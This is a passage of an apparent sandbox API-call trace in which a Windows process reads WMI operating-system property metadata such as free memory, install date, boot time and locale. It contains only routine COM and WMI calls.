	[0111.210] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a
	[0111.210] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0111.210] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0111.210] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a
	[0111.210] IUnknown:Release (This=0x2ad20696d10) returned 0x1
	[0111.210] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.210] IWbemClassObject:Get (in: This=0x2ad20696fc0, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20640b48, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FreePhysicalMemory", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.210] IWbemClassObject:Get (in: This=0x2ad20696fc0, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20640b98, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FreePhysicalMemory", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.211] GetCurrentThreadId () returned 0x6bc
	[0111.211] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.211] IWbemClassObject:Get (in: This=0x2ad20696fc0, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Number of kilobytes of physical memory currently unused and available", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.211] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.211] lstrlenA (lpString="") returned 0
	[0111.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c240, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.212] SysStringLen (param_1="Number of kilobytes of physical memory currently unused and available") returned 0x45
	[0111.212] SysStringLen (param_1="") returned 0x0
	[0111.212] GetCurrentThreadId () returned 0x6bc
	[0111.212] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.212] IWbemClassObject:Get (in: This=0x2ad20696fc0, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.212] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.212] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.212] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.212] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.212] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0111.212] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.212] SysStringLen (param_1="Description") returned 0xb
	[0111.212] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.212] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0111.212] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.212] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a
	[0111.212] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a
	[0111.212] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.213] IUnknown:Release (This=0x2ad20696fc0) returned 0x1
	[0111.213] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.213] IWbemClassObject:Get (in: This=0x2ad20697520, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b738, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FreeSpaceInPagingFiles", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.213] IWbemClassObject:Get (in: This=0x2ad20697520, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20640b48, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FreeSpaceInPagingFiles", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.213] GetCurrentThreadId () returned 0x6bc
	[0111.213] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.214] IWbemClassObject:Get (in: This=0x2ad20697520, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The total number of kilobytes that can be mapped into the operating system's paging files without causing any other pages to be swapped out.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.214] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.214] lstrlenA (lpString="") returned 0
	[0111.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c1f0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.215] SysStringLen (param_1="The total number of kilobytes that can be mapped into the operating system's paging files without causing any other pages to be swapped out.") returned 0x8c
	[0111.215] SysStringLen (param_1="") returned 0x0
	[0111.215] GetCurrentThreadId () returned 0x6bc
	[0111.215] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.215] IWbemClassObject:Get (in: This=0x2ad20697520, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.215] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.215] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16
	[0111.215] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.215] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16
	[0111.215] SysStringLen (param_1="Description") returned 0xb
	[0111.215] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16
	[0111.215] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0111.215] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16
	[0111.215] SysStringLen (param_1="ForegroundApplicationBoost") returned 0x1a
	[0111.215] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16
	[0111.216] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.216] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.216] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16
	[0111.216] IUnknown:Release (This=0x2ad20697520) returned 0x1
	[0111.216] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.216] IWbemClassObject:Get (in: This=0x2ad20698540, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20640f58, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FreeVirtualMemory", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.216] IWbemClassObject:Get (in: This=0x2ad20698540, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20640fa8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FreeVirtualMemory", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.216] GetCurrentThreadId () returned 0x6bc
	[0111.216] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.217] IWbemClassObject:Get (in: This=0x2ad20698540, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Number of kilobytes of virtual memory currently unused and available. For example, this may be calculated by adding the amount of free RAM to the amount of free paging space (i.e., adding the properties, FreePhysicalMemory and FreeSpaceInPagingFiles).", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.217] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.217] lstrlenA (lpString="") returned 0
	[0111.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c110, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.218] SysStringLen (param_1="Number of kilobytes of virtual memory currently unused and available. For example, this may be calculated by adding the amount of free RAM to the amount of free paging space (i.e., adding the properties, FreePhysicalMemory and FreeSpaceInPagingFiles).") returned 0xfb
	[0111.218] SysStringLen (param_1="") returned 0x0
	[0111.218] GetCurrentThreadId () returned 0x6bc
	[0111.218] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.218] IWbemClassObject:Get (in: This=0x2ad20698540, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.218] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.218] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0111.218] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.218] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0111.218] SysStringLen (param_1="Description") returned 0xb
	[0111.218] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0111.218] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0111.218] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0111.218] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.218] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0111.218] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16
	[0111.218] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16
	[0111.218] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0111.220] IUnknown:Release (This=0x2ad20698540) returned 0x1
	[0111.220] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.220] IWbemClassObject:Get (in: This=0x2ad20697a80, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20640f58, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.220] IWbemClassObject:Get (in: This=0x2ad20697a80, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20640fa8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.220] GetCurrentThreadId () returned 0x6bc
	[0111.220] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.220] IWbemClassObject:Get (in: This=0x2ad20697a80, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The InstallDate property is datetime value indicating when the object was installed. A lack of a value does not indicate that the object is not installed.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.221] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.221] lstrlenA (lpString="") returned 0
	[0111.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c0e0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.221] SysStringLen (param_1="The InstallDate property is datetime value indicating when the object was installed. A lack of a value does not indicate that the object is not installed.") returned 0x9a
	[0111.221] SysStringLen (param_1="") returned 0x0
	[0111.221] GetCurrentThreadId () returned 0x6bc
	[0111.221] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.222] IWbemClassObject:Get (in: This=0x2ad20697a80, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.222] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.222] SysStringLen (param_1="InstallDate") returned 0xb
	[0111.222] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.222] SysStringLen (param_1="InstallDate") returned 0xb
	[0111.222] SysStringLen (param_1="Description") returned 0xb
	[0111.222] SysStringLen (param_1="InstallDate") returned 0xb
	[0111.222] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0111.222] SysStringLen (param_1="InstallDate") returned 0xb
	[0111.222] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.222] SysStringLen (param_1="InstallDate") returned 0xb
	[0111.222] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16
	[0111.222] SysStringLen (param_1="InstallDate") returned 0xb
	[0111.222] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0111.222] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0111.222] SysStringLen (param_1="InstallDate") returned 0xb
	[0111.222] IUnknown:Release (This=0x2ad20697a80) returned 0x1
	[0111.222] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.223] IWbemClassObject:Get (in: This=0x2ad20697d30, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206ac858, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LastBootUpTime", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.223] IWbemClassObject:Get (in: This=0x2ad20697d30, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206acb88, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LastBootUpTime", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.223] GetCurrentThreadId () returned 0x6bc
	[0111.223] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.223] IWbemClassObject:Get (in: This=0x2ad20697d30, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Time when the operating system was last booted", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.224] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.224] lstrlenA (lpString="") returned 0
	[0111.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c1c0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.224] SysStringLen (param_1="Time when the operating system was last booted") returned 0x2e
	[0111.240] SysStringLen (param_1="") returned 0x0
	[0111.240] GetCurrentThreadId () returned 0x6bc
	[0111.240] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.241] IWbemClassObject:Get (in: This=0x2ad20697d30, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.241] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.242] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.242] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.242] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.242] SysStringLen (param_1="Description") returned 0xb
	[0111.242] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.242] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0111.242] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.242] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.242] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.242] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0111.242] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.242] SysStringLen (param_1="InstallDate") returned 0xb
	[0111.242] SysStringLen (param_1="InstallDate") returned 0xb
	[0111.242] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.242] IUnknown:Release (This=0x2ad20697d30) returned 0x1
	[0111.242] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.243] IWbemClassObject:Get (in: This=0x2ad20698290, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20640fa8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LocalDateTime", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.243] IWbemClassObject:Get (in: This=0x2ad20698290, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b978, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LocalDateTime", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.243] GetCurrentThreadId () returned 0x6bc
	[0111.243] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.243] IWbemClassObject:Get (in: This=0x2ad20698290, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Operating system's notion of the local date and time of day.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.243] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.244] lstrlenA (lpString="") returned 0
	[0111.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.244] SysStringLen (param_1="Operating system's notion of the local date and time of day.") returned 0x3c
	[0111.244] SysStringLen (param_1="") returned 0x0
	[0111.244] GetCurrentThreadId () returned 0x6bc
	[0111.244] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.244] IWbemClassObject:Get (in: This=0x2ad20698290, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.244] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.245] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0111.245] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.245] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0111.245] SysStringLen (param_1="Description") returned 0xb
	[0111.245] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0111.245] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.245] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0111.245] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0111.245] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0111.245] SysStringLen (param_1="InstallDate") returned 0xb
	[0111.245] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0111.245] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.245] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.245] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0111.245] IUnknown:Release (This=0x2ad20698290) returned 0x1
	[0111.245] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.245] IWbemClassObject:Get (in: This=0x2ad2069bc30, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b978, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Locale", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.246] IWbemClassObject:Get (in: This=0x2ad2069bc30, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b178, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Locale", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.246] GetCurrentThreadId () returned 0x6bc
	[0111.246] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.246] IWbemClassObject:Get (in: This=0x2ad2069bc30, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Locale property indicates the language identifier used by the operating system. A language identifier is a standard international numeric abbreviation for a country or region. Each language has a unique language identifier (LANGID), a 16-bit value that consists of a primary language identifier and a secondary language identifier.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.247] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.247] lstrlenA (lpString="") returned 0
	[0111.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c140, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.247] SysStringLen (param_1="The Locale property indicates the language identifier used by the operating system. A language identifier is a standard international numeric abbreviation for a country or region. Each language has a unique language identifier (LANGID), a 16-bit value that consists of a primary language identifier and a secondary language identifier.") returned 0x14f
	[0111.247] SysStringLen (param_1="") returned 0x0
	[0111.247] GetCurrentThreadId () returned 0x6bc
	[0111.247] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.248] IWbemClassObject:Get (in: This=0x2ad2069bc30, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.248] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.248] SysStringLen (param_1="Locale") returned 0x6
	[0111.248] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.248] SysStringLen (param_1="Locale") returned 0x6
	[0111.248] SysStringLen (param_1="Description") returned 0xb
	[0111.248] SysStringLen (param_1="Locale") returned 0x6
	[0111.248] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0111.248] SysStringLen (param_1="Locale") returned 0x6
	[0111.248] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0111.248] SysStringLen (param_1="Locale") returned 0x6
	[0111.248] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0111.248] SysStringLen (param_1="Locale") returned 0x6
	[0111.248] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0111.248] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0111.248] SysStringLen (param_1="Locale") returned 0x6
	[0111.248] IUnknown:Release (This=0x2ad2069bc30) returned 0x1
	[0111.248] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.249] IWbemClassObject:Get (in: This=0x2ad2069d9c0, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206acb28, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Manufacturer", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.249] IWbemClassObject:Get (in: This=0x2ad2069d9c0, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206ac798, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Manufacturer", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.249] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
